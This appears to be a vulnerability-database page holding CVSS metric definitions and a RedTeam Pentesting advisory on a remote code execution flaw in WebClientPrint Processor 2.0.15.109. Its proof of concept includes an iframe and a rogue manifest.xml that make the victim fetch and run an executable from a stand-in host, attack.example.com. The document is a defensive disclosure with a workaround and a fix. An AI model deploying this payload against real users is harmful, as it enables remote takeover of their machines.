The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
WebClientPrint Processor 2.0.15.109 Updates Remote Code ExecutionAdvisory: WebClientPrint Processor 2.0: Remote Code Execution via Updates
RedTeam Pentesting discovered that rogue updates trigger a remote code
execution vulnerability in WebClientPrint Processor (WCPP). These
updates may be distributed through specially crafted websites and are
processed without any user interaction as soon as the website is
accessed. However, the browser must run with administrative privileges.
Details
=======
Product: Neodynamic WebClientPrint Processor
Affected Versions: 2.0.15.109 (Microsoft Windows)
Fixed Versions: >= 2.0.15.910
Vulnerability Type: Remote Code Execution
Security Risk: low
Vendor URL: http://www.neodynamic.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-009
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
Neodynamic's WebClientPrint Processor is a client-side application,
which allows server-side applications to print documents on a client's
printer without user interaction, bypassing the browser's print
functionality. The server-side application may be written in ASP.NET or
PHP while on the client-side multiple platforms and browsers are
supported.
"Send raw data, text and native commands to client printers without
showing or displaying any print dialog box!" (Neodynamic's website)
More Details
============
Upon installation under Microsoft Windows, WCPP registers itself as a
handler for the "webclientprint" URL scheme. Thus, any URL starting with
"webclientprint:" is handled by WCPP. For example, entering
webclientprint:-about
in the URL bar of a browser opens the about box of WCPP.
During RedTeam Pentesting's investigation it turned out that WCPP
supports an undocumented update mechanism. Through the following URL the
update mechanism is triggered:
webclientprint:-update:http://legitimate.example.com/somedir/manifest.xml
This instructs WCPP to fetch the file "manifest.xml" from the
"legitimate.example.com" host. Furthermore, it was found that an XML
file of the following structure is expected:
------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<AvailableVersion>5.0.0</AvailableVersion>
<AppUrl>http://legitimate.example.com/somedir/wcpp.exe</AppUrl>
</manifest>
------------------------------------------------------------------------
Next, the XML file is parsed and the updated version of WCPP is fetched
from the URL
http://legitimate.example.com/somedir/wcpp.exe
with the returned byte stream being written to
C:\Program Files (x86)\Neodynamic\WCPP for Windows\v2.0\wcpp.exe
on a Windows 7 x86_64 machine. For the write process to succeed,
elevated or administrative privileges are required. Thus, the browser
which invokes WCPP must run with elevated or administrative privileges.
Proof of Concept
================
An attacker may prepare a malicious website containing the following
HTML code:
------------------------------------------------------------------------
<html>
<body>
<iframe src="webclientprint:-update:http://attack.example.com/somedir/manifest.xml">
</iframe>
</body>
</html>
------------------------------------------------------------------------
Furthermore, the attacker can provide a rogue manifest.xml as follows:
------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<AvailableVersion>5.0.0</AvailableVersion>
<AppUrl>http://attack.example.com/somedir/wcpp.exe</AppUrl>
</manifest>
------------------------------------------------------------------------
Finally, arbitrary code may be placed at the AppUrl URL:
http://attack.example.com/somedir/wcpp.exe
If the malicious website is visited by a WCPP user, the WCPP handler
(wcpp.exe) of the user's machine is replaced by code arbitrarily chosen
by the attacker. A visual indication of the update progress is displayed
and the success is indicated through a message box. However, successful
exploitation requires no user interaction. Any subsequent invocation of
an arbitrary webclientprint URL will result in the execution of the
attacker's code. Thus, the attacker may deliver a second inline frame
containing a webclientprint URL in order to force immediate execution of
the attacker's code.
Workaround
==========
Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.
Fix
===
Install a WCPP version greater or equal to 2.0.15.910[0].
Security Risk
=============
If a WCPP user visits an attacker-controlled website, the attacker may
execute arbitrary code on the machine of the victim user. However,
successful exploitation is only possible if the browser is running with
elevated or administrative privileges. On modern Microsoft Windows
systems, this is a rather strong prerequisite. Furthermore, the update
process is indicated on the user's screen, potentially causing
suspicion.
If successful, the attacker gains administrative privileges as well. A
skilful attacker may restore the original WCPP immediately while
migrating the malicious code to another place. This way, WCPP
functionality would not be disrupted and the attacked users may be
tricked to believe that a legitimate update has just occurred.
Because of the rarely fulfilled prerequisite of a browser running with
elevated or administrative privileges, this vulnerability is estimated
to pose a low risk.
Timeline
========
2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released
References
==========
[0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschaftsfuhrer: Patrick Hof, Jens Liebchen
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum